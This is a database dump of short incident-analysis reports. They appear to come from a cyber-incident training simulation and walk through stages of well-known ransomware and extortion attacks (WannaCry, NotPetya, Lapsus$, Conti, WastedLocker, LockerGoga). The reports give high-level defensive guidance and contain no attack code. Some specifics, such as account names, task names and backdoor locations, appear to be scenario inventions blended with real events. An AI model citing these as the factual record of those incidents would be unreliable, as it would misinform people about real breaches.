(414, 80, 894, 3, 'Persistence Mechanism Activation: Backdoor Analysis', '### Context\nThe activation of a backdoor persistence mechanism signifies that the attacker has established a foothold within the system, ensuring continued access even if initial entry points are closed.\n\n### Insights\n- Common persistence methods include registry changes, scheduled tasks, and system service modifications.\n- The backdoor may facilitate lateral movement towards more sensitive areas of the network.\n\n### Next Steps\n- **Identify**: Locate and document all persistence mechanisms implemented by the attacker.\n- **Mitigate**: Develop a removal and prevention strategy to close these backdoors.\n- **Prepare**: Anticipate unauthorized access attempts to the corporate cloud environment as the next phase.', '2026-01-15 00:59:56'),
(415, 80, 895, 4, 'Lateral Movement: Corporate Cloud Environment Breach', '### Context\nUnauthorized access to the corporate cloud environment represents a significant escalation, potentially compromising sensitive company and user data.\n\n### Insights\n- The attacker has likely leveraged compromised credentials or exploited cloud misconfigurations.\n- The focus should now be on detecting and responding to further data exfiltration attempts.\n\n### Next Steps\n- **Audit**: Perform a thorough review of cloud access logs and permissions.\n- **Contain**: Restrict access and reset credentials to limit the attacker\'s movement.\n- **Prepare**: Be vigilant for the extraction of encryption keys from cloud storage.', '2026-01-15 00:59:56'),
(416, 80, 896, 5, 'Exfiltration and Risk Assessment: Encryption Key Security', '### Context\nThe extraction of encryption keys from cloud storage marks a critical point in the breach, directly threatening the security of user data.\n\n### Insights\n- Encryption keys are vital for protecting user data, and their compromise could lead to widespread data decryption and exposure.\n- Attention should now turn towards assessing the potential impact on user master passwords and overall data integrity.\n\n### Next Steps\n- **Secure**: Immediately rotate all encryption keys and update security protocols.\n- **Assess**: Conduct a comprehensive risk assessment to determine the potential exposure of user data.\n- **Inform**: Communicate with affected users and stakeholders about the potential risks and mitigation steps being taken.', '2026-01-15 00:59:56'),
(417, 80, 897, 6, NULL, NULL, '2026-01-15 00:59:56'),
(418, 81, 898, 1, 'Execution of Unauthorized Scripts Detected', '### Overview\nFollowing the suspicious login from the third-party contractor, we have detected the execution of unauthorized scripts within the Okta environment. These scripts appear to be designed to escalate privileges and probe for vulnerabilities.\n\n### Details\n- **Time of Detection:** 14:32 GMT\n- **Scripts Identified:** Shell scripts targeting user authentication mechanisms\n- **Source:** Compromised contractor account\n\n### Next Steps\nMonitoring will focus on identifying any persistence mechanisms, such as backdoor deployments, that may have been established through these scripts.', '2026-01-15 00:59:58'),
(419, 81, 899, 2, 'Backdoor Deployment Detected for Persistent Access', '### Overview\nThe unauthorized scripts execution has led to the deployment of a backdoor within Okta\'s infrastructure. This backdoor is designed to provide Lapsus$ with persistent access to the network.\n\n### Details\n- **Backdoor Location:** Embedded within the SuperUser portal\n- **Method of Deployment:** Modification of existing scripts\n- **Persistence Indicators:** Scheduled tasks running at irregular intervals\n\n### Next Steps\nFocus will now shift to monitoring lateral movement across Okta\'s systems as attackers may attempt to access additional resources.', '2026-01-15 00:59:58'),
(420, 81, 900, 3, 'Lateral Movement Across Okta\'s Systems Identified', '### Overview\nEvidence of lateral movement has been detected as attackers utilize the backdoor to traverse Okta\'s network. This movement is aimed at accessing sensitive areas and expanding control.\n\n### Details\n- **Movement Patterns:** Utilization of compromised credentials\n- **Targeted Systems:** Customer databases and administrative tools\n- **Anomalies:** Increased traffic between internal systems\n\n### Next Steps\nThe primary concern now is the potential exfiltration of customer data. Measures are being taken to protect sensitive information.', '2026-01-15 00:59:58'),
(421, 81, 901, 4, 'Exfiltration of Customer Data Detected', '### Overview\nThe attackers have successfully exfiltrated data from Okta\'s systems, specifically targeting the customer databases. Immediate action is required to mitigate damage and notify affected parties.\n\n### Details\n- **Data Exfiltrated:** Customer credentials and personal information\n- **Method of Exfiltration:** Encrypted data transfers to external servers\n- **Volume:** Approximately 366 customer records\n\n### Next Steps\nAn analysis of supply chain trust implications is necessary to understand the broader impact and prevent future breaches.', '2026-01-15 00:59:58'),
(422, 81, 902, 5, 'Supply Chain Trust Implications Analysis', '### Overview\nFollowing the exfiltration of customer data, an analysis has been conducted on the implications for Okta\'s supply chain trust. This breach highlights vulnerabilities in third-party access management.\n\n### Details\n- **Risk Factors:** Over-reliance on third-party contractors\n- **Impact:** Potential loss of trust from affected customers\n- **Recommendations:** Implement stricter access controls and continuous monitoring of third-party activities\n\n### Conclusion\nStrengthening supply chain security is critical to preventing similar breaches in the future. Immediate steps will be taken to address existing vulnerabilities.', '2026-01-15 00:59:58'),
(423, 81, 903, 6, NULL, NULL, '2026-01-15 00:59:58'),
(424, 82, 904, 1, 'Report on Phishing Techniques Utilized by Lapsus$', '### Overview\nFollowing the initial alert of a network breach via phishing, our team has investigated the tactics employed by Lapsus$ to infiltrate Nvidia\'s network.\n\n### Phishing Methodology\nLapsus$ utilized highly targeted spear-phishing emails that impersonated Nvidia\'s IT department. These emails contained malicious links that redirected victims to a counterfeit login page, capturing their credentials.\n\n### Key Indicators\n- **Email Headers**: Look for unusual sender domains.\n- **Link Analysis**: Check for domain discrepancies.\n\n### Next Steps\nPrepare for potential malware deployment as stolen credentials could be used to introduce malicious software into the network.', '2026-01-15 01:00:55'),
(425, 82, 905, 2, 'Analysis of Malware Deployment and Credential Harvesting', '### Overview\nPost-phishing, Lapsus$ deployed malware to harvest credentials from infected systems.\n\n### Malware Characteristics\nThe malware, identified as a variant of RedLine Stealer, was designed to extract passwords, session tokens, and sensitive files from compromised devices.\n\n### Indicators of Compromise\n- **Unusual Network Traffic**: Outbound connections to C2 servers.\n- **Altered System Files**: Presence of unauthorized executables.\n\n### Next Steps\nFocus on identifying persistence mechanisms that the threat actors might employ to maintain access to the network.', '2026-01-15 01:00:55'),
(426, 82, 906, 3, 'Persistence Mechanisms and Backdoor Establishment by Lapsus$', '### Overview\nLapsus$ has established persistence within Nvidia’s systems by deploying backdoors.\n\n### Backdoor Techniques\nThe group used a combination of registry modifications and scheduled tasks to maintain access.\n\n### Defensive Measures\n- **Audit Scripts**: Regularly check for unauthorized tasks or scripts.\n- **Registry Monitoring**: Implement alerts for registry changes.\n\n### Next Steps\nPrepare for lateral movement attempts as the attackers may try to access additional network resources.', '2026-01-15 01:00:55'),
(427, 82, 907, 4, 'Lateral Movement Strategies and Network Exploration', '### Overview\nLapsus$ has begun lateral movement within the network, targeting critical systems.\n\n### Movement Tactics\nUtilizing stolen credentials and exploiting SMB vulnerabilities, Lapsus$ is accessing sensitive areas of the network.\n\n### Mitigation Strategies\n- **Network Segmentation**: Limit access between different network segments.\n- **Credential Hygiene**: Enforce multi-factor authentication.\n\n### Next Steps\nMonitor for large data transfers indicative of data exfiltration attempts.', '2026-01-15 01:00:55'),
(428, 82, 908, 5, 'Data Exfiltration Tactics and 1TB Loss Analysis', '### Overview\nLapsus$ has successfully exfiltrated 1TB of proprietary data from Nvidia\'s network.\n\n### Exfiltration Channels\nData was compressed and exfiltrated via encrypted connections to external servers.\n\n### Impact Assessment\nThe stolen data includes sensitive designs and confidential project files, posing significant intellectual property risks.\n\n### Next Steps\nExpect extortion attempts or demands related to the stolen data.', '2026-01-15 01:00:55'),
(429, 82, 909, 6, 'Extortion Demands and Public Spectacle Tactics', '### Overview\nLapsus$ has issued extortion demands, threatening to release data unless Nvidia complies with their demands for open-source drivers.\n\n### Extortion Details\n- **Demands**: Public release of proprietary drivers\n- **Threats**: Leak of sensitive data if demands are unmet\n\n### Spectacle Tactics\nLapsus$ is leveraging social media platforms to publicly pressure Nvidia and gain notoriety.\n\n### Recommended Actions\n- **Public Relations Strategy**: Develop a communication plan to address potential leaks.\n- **Legal Measures**: Coordinate with law enforcement and legal teams to address the extortion.', '2026-01-15 01:00:55'),
(430, 82, 910, 7, NULL, NULL, '2026-01-15 01:00:55'),
(431, 84, 911, 1, 'Analysis of Initial Access via Phishing', '### Report: Initial Access via Phishing\n\n**Summary:**\nThe first phase of the Conti ransomware attack on Costa Rica was initiated through a sophisticated phishing campaign. Emails containing malicious attachments or links were sent to various government employees, masquerading as official communications.\n\n**Technical Details:**\n- **Sender:** Spoofed email addresses mimicking legitimate government domains.\n- **Attachments/Links:** Contained malicious payloads designed to execute upon interaction.\n- **Indicators of Compromise (IOCs):**\n  - Known malicious domains used for phishing.\n  - Hashes of malicious attachments.\n\n**Recommendations:**\n- Immediate education and awareness training for government employees.\n- Implementation of robust email filtering and phishing detection solutions.\n\nThe next phase involves analyzing the execution of the malicious scripts detected within the network.', '2026-01-15 01:02:55'),
(432, 84, 912, 2, 'Detection of Malicious Script Execution', '### Report: Malicious Script Execution Detected\n\n**Summary:**\nFollowing the initial phishing attack, malicious scripts were executed across compromised systems. These scripts were designed to establish a foothold for further malicious activities.\n\n**Technical Details:**\n- **Script Language:** Predominantly PowerShell and batch scripts.\n- **Functionality:**\n  - Download and execution of additional malware components.\n  - Disabling of security measures.\n- **IOCs:**\n  - Script hashes and command-line arguments.\n\n**Recommendations:**\n- Monitor for unusual script execution activities.\n- Enhance endpoint detection and response (EDR) capabilities.\n\nThe subsequent report will focus on the persistence mechanisms detected within the network, establishing a backdoor for continued access.', '2026-01-15 01:02:55'),
(433, 84, 913, 3, 'Establishment of Persistence Mechanism', '### Report: Persistence Mechanism Established\n\n**Summary:**\nThe attackers succeeded in installing backdoors on several compromised systems, ensuring persistent access even after system reboots or network changes.\n\n**Technical Details:**\n- **Backdoor Types:** Custom-built remote access tools (RATs) and modified legitimate software.\n- **Installation Methods:**\n  - Scheduled tasks.\n  - Registry modifications.\n  - Service creation.\n- **IOCs:**\n  - Network traffic patterns indicative of RAT communication.\n  - Unusual registry keys and scheduled tasks.\n\n**Recommendations:**\n- Conduct thorough system audits and backdoor hunting.\n- Reinforce network segmentation to limit lateral movement.\n\nThe upcoming report will delve into the lateral movement activities, detailing how attackers progressed to multiple ministries through credential theft.', '2026-01-15 01:02:55'),
(434, 84, 914, 4, NULL, NULL, '2026-01-15 01:02:55'),
(435, 83, 915, 1, 'Initial Access Overview', '### Unauthorized Access Detected on Samsung Network\n\n**Summary:**\nThe initial unauthorized access to Samsung\'s network was detected via anomalous login patterns. Analysts have confirmed the use of compromised credentials likely obtained through a phishing campaign targeting Samsung employees.\n\n**Next Steps:**\n- Monitor for any script execution that may indicate further malicious activity.\n- Conduct an internal audit to identify other potentially compromised accounts.\n\n**Recommendations:**\n- Implement multi-factor authentication (MFA) across all user and admin accounts.\n- Enhance phishing awareness training for employees.', '2026-01-15 01:03:01'),
(436, 83, 916, 2, 'Malicious Script Execution Analysis', '### Malicious Script Execution Identified\n\n**Summary:**\nFollowing initial access, a malicious script was executed on several workstations within the Samsung network. This script is suspected to have been used to deploy additional payloads and establish persistence.\n\n**Next Steps:**\n- Investigate the deployment of any unauthorized backdoors on critical servers.\n- Analyze the script to determine its full capabilities and potential impact.\n\n**Recommendations:**\n- Implement endpoint detection and response (EDR) solutions to monitor for script-based attacks.\n- Conduct regular security audits of server configurations.', '2026-01-15 01:03:01'),
(437, 83, 917, 3, 'Backdoor Establishment Investigation', '### Backdoor Established on Critical Servers\n\n**Summary:**\nThe investigation has confirmed the establishment of a backdoor on Samsung\'s critical servers. This backdoor allows for remote access, facilitating further malicious activities and potential data exfiltration.\n\n**Next Steps:**\n- Monitor for any lateral movement within the development environment, indicating the attacker\'s attempt to expand their access.\n- Conduct a thorough forensic analysis of affected servers to profile the backdoor.\n\n**Recommendations:**\n- Isolate compromised servers and begin incident response procedures.\n- Update and patch all systems to mitigate known vulnerabilities.', '2026-01-15 01:03:01'),
(438, 83, 918, 4, 'Lateral Movement and Exfiltration Concerns', '### Lateral Movement Across Development Environment\n\n**Summary:**\nThe attackers have begun moving laterally across Samsung\'s development environment, indicating a search for valuable data and intellectual property. This movement suggests an imminent risk of data exfiltration.\n\n**Next Steps:**\n- Deploy network monitoring to detect and prevent large-scale data transfers to external servers.\n- Increase security on sensitive data repositories to prevent unauthorized access.\n\n**Recommendations:**\n- Implement network segmentation to limit lateral movement.\n- Educate development teams on secure coding practices and data handling.', '2026-01-15 01:03:01'),
(439, 83, 919, 5, NULL, NULL, '2026-01-15 01:03:01'),
(440, 85, 920, 1, 'Analysis of Initial SMB Exploitation', '### Context\nThe Lazarus Group initiated their attack on the NHS systems by exploiting a known SMB vulnerability. This vulnerability, identified as CVE-2017-0144, allowed the attackers to gain unauthorized access to the network.\n\n### Insight\nThe affected systems were primarily those that had not received the necessary security patches. The EternalBlue exploit was used to take advantage of the unpatched systems, highlighting the critical need for timely updates and patches.\n\n### Next Steps\nPrepare for potential malware deployment as the attackers have successfully accessed the network.', '2026-01-15 01:03:39'),
(441, 85, 921, 2, 'Deployment of WannaCry Ransomware', '### Context\nFollowing the successful exploitation of the SMB vulnerability, the attackers deployed the WannaCry ransomware across the NHS network.\n\n### Insight\nThe ransomware encrypted critical data, demanding a ransom in Bitcoin to decrypt the files. This deployment affected numerous systems, causing significant operational disruptions.\n\n### Next Steps\nInvestigate methods the attackers may use to maintain persistence within the network, potentially through scheduled tasks or other mechanisms.', '2026-01-15 01:03:39'),
(442, 85, 922, 3, 'Persistence Mechanisms Identified', '### Context\nThe attackers established persistence within the NHS network by utilizing scheduled tasks and other methods to ensure the ransomware could survive system reboots.\n\n### Insight\nBy creating scheduled tasks, the ransomware was able to reinitiate itself, complicating remediation efforts and prolonging the disruption.\n\n### Next Steps\nEfforts should focus on detecting lateral movement attempts as the attackers seek to propagate the ransomware across the network.', '2026-01-15 01:03:39'),
(443, 85, 923, 4, 'Lateral Movement and Network Propagation', '### Context\nThe ransomware began to propagate laterally across the NHS network, leveraging the same SMB vulnerability and exploiting other unpatched systems.\n\n### Insight\nThis propagation led to widespread system infections, significantly impacting hospital operations, including canceled surgeries and delayed patient care.\n\n### Next Steps\nFocus on mitigating the operational disruption and begin formulating an incident response plan to manage the crisis.', '2026-01-15 01:03:39'),
(444, 85, 924, 5, 'Operational Disruption and Incident Response', '### Context\nThe propagation of the ransomware resulted in severe operational disruptions within the NHS, affecting patient care and hospital services.\n\n### Insight\nThe strain on resources highlighted the critical need for robust incident response strategies. Additionally, a kill-switch domain was accidentally discovered, which halted the spread of the ransomware temporarily.\n\n### Next Steps\nInvestigate the impact of the kill-switch domain discovery and prepare for potential future attacks by reinforcing cybersecurity measures.', '2026-01-15 01:03:39'),
(445, 85, 925, 6, NULL, NULL, '2026-01-15 01:03:39'),
(446, 86, 926, 1, 'Malicious Payload Deployment Detected', '# Report: Malicious Payload Deployment Detected\n\n## Overview\nFollowing the detection of RDP brute-force attempts, our systems have identified the deployment of a malicious payload. This marks the execution phase of the attack.\n\n## Details\n- **Payload Type:** SamSam ransomware\n- **Delivery Mechanism:** Confirmed through compromised RDP sessions\n- **Timestamp:** 2 hours after initial access detection\n\n## Implications\nThe execution of this payload suggests that the attackers have gained a significant foothold within the network, allowing them to initiate the encryption process on targeted systems.\n\n## Recommendations\n- Immediate isolation of affected systems\n- Deployment of endpoint protection solutions to detect and block further payload executions\n\n## Next Steps\nPrepare for potential persistence mechanisms as attackers may attempt to maintain access even if the payload is neutralized.', '2026-01-15 01:04:52'),
(447, 86, 927, 2, 'Establishing Foothold: Persistence Mechanisms Analyzed', '# Report: Establishing Foothold - Persistence Mechanisms Analyzed\n\n## Overview\nPost-malicious payload deployment, analysis indicates that attackers are establishing persistence within the network.\n\n## Details\n- **Persistence Techniques:** Scheduled tasks and registry key modifications\n- **Targets:** Critical servers and high-value endpoints\n- **Detection:** Unusual network traffic patterns and system anomalies\n\n## Implications\nThe use of persistence mechanisms indicates a calculated effort to maintain access and control over the compromised network components.\n\n## Recommendations\n- Conduct thorough network and system scans for known persistence signatures\n- Implement enhanced monitoring for unusual system changes\n\n## Next Steps\nFocus on detecting lateral movement as attackers may attempt to spread the ransomware further within the network.', '2026-01-15 01:04:52'),
(448, 86, 928, 3, 'Lateral Movement Detected: Ransomware Spreading', '# Report: Lateral Movement Detected - Ransomware Spreading\n\n## Overview\nEvidence of lateral movement has been detected, indicating that the ransomware is spreading across the network.\n\n## Details\n- **Movement Method:** Utilizing compromised credentials and network shares\n- **Affected Systems:** Multiple network segments including user workstations and file servers\n- **Indicators of Compromise:** Elevated network traffic and file encryption activities\n\n## Implications\nThe lateral spread of ransomware significantly increases the risk of data loss and operational disruption.\n\n## Recommendations\n- Segment the network to contain the spread\n- Change compromised credentials and enhance password policies\n\n## Next Steps\nPrepare for potential data exfiltration activities as attackers may attempt to harvest sensitive information.', '2026-01-15 01:04:52'),
(449, 86, 929, 4, 'Exfiltration Alert: Data Harvesting Activities Identified', '# Report: Exfiltration Alert - Data Harvesting Activities Identified\n\n## Overview\nFollowing the spread of ransomware, there are indications of data harvesting activities aimed at exfiltrating sensitive information.\n\n## Details\n- **Methods Employed:** Data compression and encrypted outbound communications\n- **Targeted Data:** Customer records and internal financial documents\n- **Detection:** Unusual data flows to external IP addresses\n\n## Implications\nData exfiltration poses a significant threat to privacy and regulatory compliance, potentially leading to reputational damage and legal consequences.\n\n## Recommendations\n- Monitor and block suspicious outbound communications\n- Review and tighten data access controls\n\n## Next Steps\nAnticipate and prepare for ransom demands, ensuring communication channels are monitored for any contact from the attackers.', '2026-01-15 01:04:52'),
(450, 86, 930, 5, 'Ransom Demand Intercepted: Communication Analysis', '# Report: Ransom Demand Intercepted - Communication Analysis\n\n## Overview\nA ransom demand from the attackers has been intercepted, marking the command and control phase of the attack.\n\n## Details\n- **Communication Method:** Email with ransom instructions\n- **Demand Amount:** $51,000 in Bitcoin\n- **Deadline:** Payment required within 7 days to prevent data release\n\n## Implications\nThe intercepted communication highlights the attackers\' intent to monetize the attack, leveraging encrypted data as leverage.\n\n## Recommendations\n- Engage cybersecurity and legal experts to evaluate response options\n- Consider possible negotiation strategies and explore decryption solutions\n\n## Next Steps\nContinue monitoring for any further communications from the attackers and implement a public relations strategy to manage potential fallout.', '2026-01-15 01:04:52'),
(451, 86, 931, 6, NULL, NULL, '2026-01-15 01:04:52'),
(452, 87, 960, 1, NULL, NULL, '2026-01-17 03:37:48'),
(453, 87, 961, 2, 'Analysis of Malicious Script Execution', '## Overview\nFollowing the suspicious remote access attempt, a malicious script execution was detected within the city\'s systems. This is indicative of the attackers moving to the next phase of their operation.\n\n## Technical Details\n- **Script Type**: PowerShell script\n- **Execution Context**: The script was executed under a compromised user account with elevated privileges.\n- **Detected Actions**:\n  - **File Encryption**: The script initiated file encryption processes on critical city servers.\n  - **Network Reconnaissance**: The script performed network scanning to identify other vulnerable systems.\n\n## Implications\nThis script execution is a clear signal of an active attack, transitioning from initial access to execution. Immediate containment and further investigation are required to prevent further damage.', '2026-01-17 03:37:48'),
(454, 87, 962, 3, 'Unauthorized Account Creation Investigation', '## Overview\nPost detection of malicious script execution, an unauthorized account creation was observed. This suggests the attackers are establishing persistence within the system.\n\n## Technical Details\n- **Account Name**: temp_admin_balt\n- **Privileges**: Administrative rights granted\n- **Creation Method**: The account was created using a compromised admin credential via the compromised remote access tool.\n\n## Implications\nThe creation of unauthorized accounts allows the attackers to maintain access even if initial entry points are closed. This persistence mechanism requires immediate intervention to revoke unauthorized privileges and secure credentials.', '2026-01-17 03:37:48'),
(455, 87, 963, 4, 'Investigation into Lateral Movement Activity', '## Overview\nFollowing the establishment of persistence, anomalous lateral movement activity was detected, indicating the attackers are exploring and exploiting additional systems within the network.\n\n## Technical Details\n- **Movement Pattern**: The attackers utilized existing network shares and admin credentials to access other critical systems.\n- **Tools Used**: Remote Desktop Protocol (RDP) and SMB protocol were primarily used for lateral movement.\n\n## Implications\nThis lateral movement could lead to further system compromises, increasing the risk of widespread impact. Immediate network segmentation and enhanced monitoring are recommended to mitigate further propagation.', '2026-01-17 03:37:48'),
(456, 87, 964, 5, 'Data Exfiltration Attempt Analysis', '## Overview\nThe final stage observed was an attempt to exfiltrate sensitive data from the compromised systems. This highlights the attackers\' objective to extract valuable information.\n\n## Technical Details\n- **Data Type**: Financial records and personal information.\n- **Exfiltration Method**: Data was compressed and encrypted before being transmitted over HTTP to an external server.\n- **Destination IP**: Traced to a known malicious IP address previously associated with similar ransomware activities.\n\n## Implications\nSuccessful data exfiltration could result in severe financial and reputational damage. A comprehensive response strategy to secure data in transit and at rest is critical, alongside legal consultations for potential breach notifications.', '2026-01-17 03:37:48'),
(457, 88, 965, 1, 'WastedLocker Payload Execution', '## Context for WastedLocker Payload Execution\n\nFollowing the successful phishing campaign, Evil Corp has initiated the deployment of the WastedLocker ransomware payload. This malware is specifically crafted to encrypt files crucial to Garmin\'s operations, demanding a significant ransom.\n\n### Key Indicators:\n- **Phishing Origin**: Traced to a compromised email server.\n- **Payload Delivery**: Via malicious email attachments and links.\n\n### Next Steps:\nPrepare for potential payload execution by monitoring unusual file changes and system behavior indicative of malware activity.', '2026-01-17 03:38:37'),
(458, 88, 966, 2, 'Persistence through Scheduled Tasks', '## Insight into Persistence Mechanisms\n\nWith the WastedLocker payload now active, Evil Corp employs techniques to ensure the malware persists across system reboots, primarily through the creation of scheduled tasks.\n\n### Persistence Details:\n- **Scheduled Tasks**: Configured to execute the ransomware upon system startup.\n- **Registry Modifications**: Additional keys for maintaining persistence.\n\n### Next Steps:\nEnhance monitoring of task scheduler activities and registry changes to detect and mitigate persistence strategies.', '2026-01-17 03:38:37'),
(459, 88, 967, 3, 'Lateral Movement via RDP Detected', '## Analysis of Lateral Movement\n\nEvil Corp\'s objective to infiltrate deeper into Garmin\'s network is evident through the utilization of Remote Desktop Protocol (RDP) for lateral movement.\n\n### Movement Patterns:\n- **RDP Sessions**: Unusual login attempts from compromised accounts.\n- **Network Traffic Anomalies**: Increased data transfer between key nodes.\n\n### Next Steps:\nStrengthen RDP security policies, monitor unusual login patterns, and restrict access to critical systems.', '2026-01-17 03:38:37'),
(460, 88, 968, 4, 'Data Exfiltration and Encryption - Final Stage', '## Final Stage of WastedLocker Attack\n\nEvil Corp has reached the final stage of their attack, focusing on data exfiltration and the encryption of sensitive data, leading to significant operational disruptions.\n\n### Key Observations:\n- **Data Exfiltration**: Substantial outbound traffic to known malicious IPs.\n- **Encryption Impact**: Critical systems and data rendered inaccessible.\n\n### Next Steps:\nInitiate incident response protocols, assess the full extent of the breach, and consider negotiation strategies while exploring decryption possibilities.', '2026-01-17 03:38:37'),
(461, 88, 969, 5, NULL, NULL, '2026-01-17 03:38:37'),
(462, 89, 970, 1, NULL, NULL, '2026-01-17 03:39:18'),
(463, 89, 971, 2, 'Malware Execution Analysis', '### Malware Execution Observed\n\nFollowing the detection of suspicious network activity, our team confirmed the execution of the LockerGoga ransomware on several endpoints within the aluminum manufacturing network. **Indicators of Compromise (IoCs)** identified include:\n\n- Unfamiliar binaries executed from `C:\\Windows\\Temp`\n- Code signing certificates used to bypass security tools\n\n**Next Steps:** Investigate the initial access point to determine how the malware was deployed and identify other potentially compromised systems.', '2026-01-17 03:39:18'),
(464, 89, 972, 3, 'Persistence Mechanism Investigation', '### Unauthorized Scheduled Task Created\n\nPost malware execution, an unauthorized scheduled task was identified. This task is configured to run a malicious executable at regular intervals, ensuring the ransomware\'s persistence across reboots. **Details include:**\n\n- Task name: `UpdateCheck`\n- Executable path: `C:\\Windows\\System32\\update.exe`\n\n**Next Steps:** Disable the scheduled task and analyze its creation method to prevent future persistence mechanisms.', '2026-01-17 03:39:18'),
(465, 89, 973, 4, 'Lateral Movement Activity Report', '### Lateral Movement Detected Across Network\n\nThe ransomware has initiated lateral movement within the network. **Key Observations:**\n\n- Unauthorized SMB connections from compromised systems\n- Use of valid credentials to access shared network drives\n\n**Next Steps:** Isolate affected systems and monitor for further lateral movement attempts. Begin a comprehensive credential audit to limit unauthorized access.', '2026-01-17 03:39:18'),
(466, 89, 974, 5, 'Data Exfiltration Monitoring', '### Data Exfiltration Alert Triggered\n\nA significant alert was triggered indicating potential data exfiltration activity. **Observed actions include:**\n\n- Large amounts of data compressed and sent to external IP addresses\n- Use of encrypted communication channels\n\n**Next Steps:** Identify the scope of data exfiltrated and implement outbound traffic restrictions to prevent further data loss.', '2026-01-17 03:39:18'),
(467, 89, 975, 6, 'Ransom Note Discovery and Impact Assessment', '### Ransom Note Discovered\n\nA ransom note has been discovered on multiple machines, indicating the impact of the LockerGoga ransomware. **Content highlights:**\n\n- Demands for payment in cryptocurrency\n- Threats to leak sensitive data if demands are not met\n\n**Next Steps:** Begin the process of backup restoration and manual operations to minimize downtime. Engage with law enforcement and cybersecurity experts for further guidance.', '2026-01-17 03:39:18'),
(468, 90, 976, 1, 'Understanding the Initial Breach', '## Initial Network Breach Detected\n\nFollowing the detection of an unauthorized network intrusion, forensic analysis indicates that the attack vector was a compromised software update. This method allowed attackers to bypass Maersk\'s perimeter defenses, gaining access to critical systems.\n\n### Key Findings:\n- **Attack Vector:** Compromised software update\n- **Entry Point:** Vulnerable third-party application\n- **Impacted Systems:** Corporate network including email servers and critical business applications\n\n### Next Steps:\nThe next phase involves monitoring the execution and spread of the malware to understand its impact and to implement measures to halt its progress. The team is also tasked with identifying any additional vulnerabilities that could be exploited by similar attacks.', '2026-01-17 03:39:49'),
(469, 90, 977, 2, 'Analyzing the NotPetya Malware Spread', '## Malware Execution and Spread - NotPetya Detected\n\nAs the NotPetya malware activated, it quickly propagated through the network, leveraging lateral movement techniques. NotPetya, a wiper disguised as ransomware, aimed to cause maximum disruption by encrypting the Master Boot Record (MBR) of infected machines.\n\n### Key Points:\n- **Malware Characteristics:** Wiper malware masquerading as ransomware\n- **Propagation Method:** Exploits EternalBlue and other vulnerabilities\n- **Impact:** Widespread system failures, leading to operational standstill\n\n### Strategic Response:\nThe priority is to identify any points of resilience within the network, such as isolated systems or backups, that can be leveraged to begin recovery. The incident response team must also work on containing the spread by isolating affected segments and implementing network controls.', '2026-01-17 03:39:49'),
(470, 90, 978, 3, NULL, NULL, '2026-01-17 03:39:49'),
(471, 91, 979, 1, 'Analysis of Initial Breach Points', '### Contextual Overview\nFollowing the detection of a supply chain compromise, our analysis has identified multiple potential entry points. The breach likely originated from a third-party vendor with privileged access to the corporate network.\n\n### Key Findings\n- **Vulnerability Exploitation**: Initial breach vectors include outdated software on connected devices and inadequate network segmentation.\n- **Supply Chain Vendor**: The compromised vendor was involved in the distribution of pharmaceutical components, highlighting the need for stringent security protocols.\n\n### Recommendations\n- Immediate audit of third-party vendor security practices.\n- Implementation of stricter access controls and network segmentation.', '2026-01-17 03:41:52'),
(472, 91, 980, 2, 'Impact Assessment: NotPetya Malware Deployment', '### Malware Overview\nNotPetya, a variant of the Petya ransomware, has been deployed, resulting in widespread disruption across pharmaceutical operations.\n\n### Effects Observed\n- **System Lockdowns**: Critical systems have been encrypted, making data recovery difficult without backups.\n- **Operational Halt**: Production and distribution channels have experienced significant downtime.\n\n### Immediate Actions\n- Initiate incident response protocols focused on containment and eradication.\n- Begin forensic analysis to understand malware spread and potential points of persistence.', '2026-01-17 03:41:52'),
(473, 91, 981, 3, 'Persistence Strategy Analysis', '### Backdoor Installation\nOur threat intelligence indicates the presence of backdoor installations, designed to maintain persistent access within the network.\n\n### Technical Details\n- **Backdoor Type**: Custom remote access tools have been deployed, indicating a sophisticated attack strategy.\n- **Network Impact**: These backdoors facilitate further infiltration and data theft.\n\n### Mitigation Steps\n- Conduct a complete sweep for known backdoor signatures.\n- Strengthen network monitoring to detect unusual outbound traffic.', '2026-01-17 03:41:52'),
(474, 91, 982, 4, 'Lateral Movement Techniques', '### Threat Actor Activities\nCredential theft has facilitated extensive lateral movement across the network, targeting vaccine production systems.\n\n### Observations\n- **Credential Harvesting**: Attackers have obtained privileged credentials, allowing access to sensitive areas of the network.\n- **Targeted Systems**: Focus has been on systems integral to vaccine production and distribution.\n\n### Defensive Measures\n- Implement multi-factor authentication across all systems.\n- Regularly update and patch systems to reduce vulnerabilities.', '2026-01-17 03:41:52'),
(475, 91, 983, 5, 'Data Exfiltration Incident', '### Exfiltration Analysis\nSensitive information, including proprietary research and personal data, has been exfiltrated, posing significant operational and reputational risks.\n\n### Data Types Compromised\n- **Intellectual Property**: Critical R&D data relating to new pharmaceuticals.\n- **Personal Information**: Employee and client data, increasing the risk of further exploitation.\n\n### Strategic Response\n- Notify affected parties and regulators as required by compliance standards.\n- Initiate data breach management and recovery processes.', '2026-01-17 03:41:52'),
(476, 91, 984, 6, 'Destructive Actions on Critical Infrastructure', '### Infrastructure Targeting\nICS/SCADA systems have been specifically targeted, leading to potential safety and operational risks.\n\n### Impact Analysis\n- **System Disruptions**: Operational technology has been disrupted, affecting production safety.\n- **Safety Concerns**: Risk of physical harm due to altered operational parameters.\n\n### Remediation Strategies\n- Isolate affected systems and restore from secure backups.\n- Review and update incident response plans to include ICS/SCADA scenarios.', '2026-01-17 03:41:52'),
(477, 91, 985, 7, 'Legal Implications: Cyber Insurance \'Act of War\' Clause', '### Legal Context\nThe cyber insurance \'act of war\' clause has been invoked, sparking a legal battle over coverage applicability.\n\n### Key Considerations\n- **Policy Interpretation**: Insurers argue that the attack constitutes an act of war, thus voiding coverage.\n- **Precedent and Implications**: This case could set a legal precedent affecting future cyber insurance claims.\n\n### Next Steps\n- Engage legal counsel specializing in cyber law to navigate the complexities of this case.\n- Explore alternative risk management strategies including enhanced cyber defenses.', '2026-01-17 03:41:52'),
(478, 92, 986, 1, 'Post-Phishing Analysis', '### Overview\nAfter the initial access was gained via a phishing email, it is crucial to understand the method and content used to deceive the recipient. \n\n### Details\n- **Phishing Email Characteristics**: The email appeared to be from a trusted vendor, using social engineering tactics to prompt immediate action.\n- **Payload**: The attachment contained a malicious macro that executed the NotPetya malware.\n\n### Next Steps\nPrepare for potential malware execution. Monitor network traffic for unusual activities, and review email filtering rules to prevent similar incidents.', '2026-01-17 03:41:59'),
